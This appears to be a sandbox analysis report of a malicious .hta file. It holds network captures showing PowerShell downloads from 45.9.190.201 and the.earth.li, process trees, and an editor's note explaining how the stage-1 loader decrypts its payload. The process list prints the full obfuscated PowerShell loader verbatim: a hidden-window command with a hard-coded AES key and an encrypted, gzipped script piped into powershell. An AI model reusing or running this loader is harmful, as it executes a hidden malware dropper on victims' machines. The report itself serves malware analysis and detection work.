                          Oct 6, 2023 15:30:13.697643995 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697655916 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697666883 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697679043 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697695017 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.697717905 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697726965 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.697731018 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697771072 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.697805882 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697861910 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697899103 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.698087931 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698223114 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698260069 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.698283911 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698297024 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698328972 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.698353052 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698367119 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698402882 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.698478937 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698510885 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698523045 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698575974 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698597908 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.698610067 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.698757887 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698904037 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698940039 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.698968887 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698982000 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.698993921 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699006081 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699021101 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.699029922 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.699054956 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699068069 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699078083 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699111938 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.699120045 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699157953 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.699259996 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699372053 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699384928 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699395895 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699409008 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.699444056 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.699553013 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699565887 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699599981 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.699609041 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699623108 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699657917 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.699810982 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699824095 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.699856997 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.700038910 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700052023 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700062990 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700088024 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.700184107 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700237036 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.700261116 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700274944 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700285912 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700310946 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700310946 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.700351000 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.700504065 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700555086 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700566053 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700594902 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.700736046 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700750113 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700762987 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700776100 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.700803995 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.700831890 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.700963974 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701004028 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.701107979 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701164007 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701176882 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701189041 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701200008 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.701203108 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701227903 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.701318979 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701359987 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.701387882 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701401949 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701440096 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.701519966 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701569080 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701605082 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.701739073 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701775074 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701808929 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.701843977 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701900005 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.701934099 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.702122927 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702172995 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702209949 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.702250957 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702282906 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702317953 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.702333927 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702347040 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702375889 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702378035 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.702452898 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702491999 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.702516079 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702641010 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702687979 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.702804089 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702816010 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702843904 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702847004 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.702857018 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702887058 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702889919 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.702899933 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.702934027 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.703035116 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703087091 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703120947 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.703161955 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703274965 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703313112 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.703377008 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703416109 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703429937 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703454971 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.703464031 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703500986 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.703572035 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703607082 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703641891 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.703711033 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703723907 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.703758001 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.703986883 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704029083 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704035997 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704046011 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704073906 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.704097986 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704101086 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.704159975 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704196930 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.704351902 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704397917 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704435110 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.704457998 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704478979 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704499960 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704518080 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.704524994 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704536915 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704561949 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.704597950 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.704633951 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.963336945 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963371992 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963383913 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963395119 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963406086 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963418961 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963430882 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963442087 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963495970 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.963501930 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963527918 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963531017 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.963574886 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.963881016 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963896036 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963916063 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.963936090 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.963999033 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964025974 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964040995 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.964050055 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964090109 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.964251041 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964267969 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964303017 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.964306116 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964322090 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964354992 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964354992 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.964370966 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964406967 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.964660883 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964677095 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.964715004 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.964731932 CEST804970993.93.131.124192.168.2.8
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Oct 6, 2023 15:30:11.860217094 CEST | 63001 | 53 | 192.168.2.8 | 1.1.1.1
                          Oct 6, 2023 15:30:12.042332888 CEST | 53 | 63001 | 1.1.1.1 | 192.168.2.8

                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Oct 6, 2023 15:30:11.860217094 CEST | 192.168.2.8 | 1.1.1.1 | 0xdb9f | Standard query (0) | the.earth.li | A (IP address) | IN (0x0001) | false

                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Oct 6, 2023 15:30:12.042332888 CEST | 1.1.1.1 | 192.168.2.8 | 0xdb9f | No error (0) | the.earth.li | | 93.93.131.124 | A (IP address) | IN (0x0001) | false

                          • 45.9.190.201
                          • the.earth.li

                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          0 | 192.168.2.8 | 49708 | 45.9.190.201 | 80 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                          Timestamp | kBytes transferred | Direction | Data
                          Oct 6, 2023 15:30:10.432358980 CEST | 0 | OUT | GET /Research.pdf HTTP/1.1
                          Host: 45.9.190.201
                          Connection: Keep-Alive
                          Oct 6, 2023 15:30:10.711105108 CEST | 2 | IN | HTTP/1.1 200 OK
                          Date: Fri, 06 Oct 2023 13:30:10 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Last-Modified: Tue, 03 Oct 2023 23:57:26 GMT
                          ETag: "19e0d-606d8a71f94a6"
                          Accept-Ranges: bytes
                          Content-Length: 105997
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/pdf


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          1 | 192.168.2.8 | 49709 | 93.93.131.124 | 80 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                          Timestamp | kBytes transferred | Direction | Data
                          Oct 6, 2023 15:30:12.350323915 CEST | 111 | OUT | GET /~sgtatham/putty/0.63/x86/putty.exe HTTP/1.1
                          Host: the.earth.li
                          Connection: Keep-Alive
                          Oct 6, 2023 15:30:12.620089054 CEST | 113 | IN | HTTP/1.1 200 OK
                          Date: Fri, 06 Oct 2023 13:30:12 GMT
                          Server: Apache
                          Last-Modified: Tue, 06 Aug 2013 17:32:58 GMT
                          ETag: "79000-4e34ad0df95b5"
                          Accept-Ranges: bytes
                          Content-Length: 495616
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/x-msdos-program



                          Target ID:0
                          Start time:15:30:04
                          Start date:06/10/2023
                          Path:C:\Windows\SysWOW64\mshta.exe
                          Wow64 process (32bit):true
                          Commandline:mshta.exe "C:\Users\user\Desktop\a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta"
                          Imagebase:0x770000
                          File size:13'312 bytes
                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:1
                          Start time:15:30:07
                          Start date:06/10/2023
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = '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';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }
                          Imagebase:0xc0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high
                          Has exited:true

                          Target ID:2
                          Start time:15:30:07
                          Start date:06/10/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:3
                          Start time:15:30:08
                          Start date:06/10/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = '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';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell -
                          Imagebase:0xa40000
                          File size:236'544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:15:30:08
                          Start date:06/10/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:5
                          Start time:15:30:08
                          Start date:06/10/2023
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = 
$kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR
                          Imagebase:0xc0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:15:30:08
                          Start date:06/10/2023
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:powershell -
                          Imagebase:0xc0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high
                          Has exited:true
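
The Target 5 command line above is a self-contained unpacker: $fNaPOP is a base64 blob whose first 16 bytes are assigned to .IV (never used, because CipherMode is ECB), the rest is AES-256 ciphertext under the hard-coded key $mehLaZDc, the plaintext is zero-padded gzip, and the gunzipped UTF-8 string is left as the final expression so it is written to the process's standard output. Target 6, "powershell -", reads its script from standard input; the report does not show the pipe, but a stage-1 process that emits a script followed by a stdin-reading powershell child is consistent with the decrypted text being fed straight into it. Because the key travels next to the ciphertext, any record of the process creation (this sandbox entry, a 4688 event with command-line auditing enabled, or Sysmon Event ID 1) is enough to recover stage 2 without the .hta. The Go program below is an added example by the editor, not code from the report or from the sample; it replays the chain offline with only the standard library. The key constant is the one from the report, the payload is read from stdin so the long blob is not retyped, and the encoder half is a reconstruction from the decrypt parameters that exists only to build test vectors.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"encoding/base64"
	"fmt"
	"io"
	"os"
)

// stageKeyB64 is $mehLaZDc from the Target 5 command line (a 32-byte AES-256 key).
const stageKeyB64 = "d2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo="

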